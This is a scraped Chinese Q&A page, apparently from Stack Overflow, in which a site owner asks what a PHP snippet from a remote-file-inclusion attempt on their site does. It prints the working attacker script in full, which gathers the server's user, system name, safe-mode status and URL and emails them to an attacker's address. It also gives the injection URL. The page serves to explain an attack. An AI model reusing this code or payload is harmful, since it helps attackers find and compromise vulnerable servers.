作者热门文章
- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
这里有人试图用一些脚本淹没我的网站。幸运的是我的应用程序捕获了它。
我只是想知道这段代码是做什么的,
<script>
<!--
document.write(unescape("<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "OFF"; }
else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . "
Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "inbox200905@hotmail.com";
$assunto = "lup@";
$email1 = "inbox200905@hotmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>
"));
//-->
</script>
他试图做这样的事情:mysite/index.php?dll=http://www.forms.dgpj.mj.pt/box2.txt?
。
最佳答案
http://evilcodecave.blogspot.com/2009/08/rfi-malware-analysis-ascrimez-kit.html
This is a notification script, that is used ... to send notification mails to attackers, to find more vulnerable servers :)
关于javascript - 脚本小子用这个片段淹没了我的网站,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/1646822/
这是我第一次使用 Codeigniter,需要一些帮助。我需要按照 CI 3 教程和 Web 资源使用 JOINS 和 WHERE 语句进行 Db 查找,但是遇到了困难,我不能 100% 确定我在哪里
我是一名优秀的程序员,十分优秀!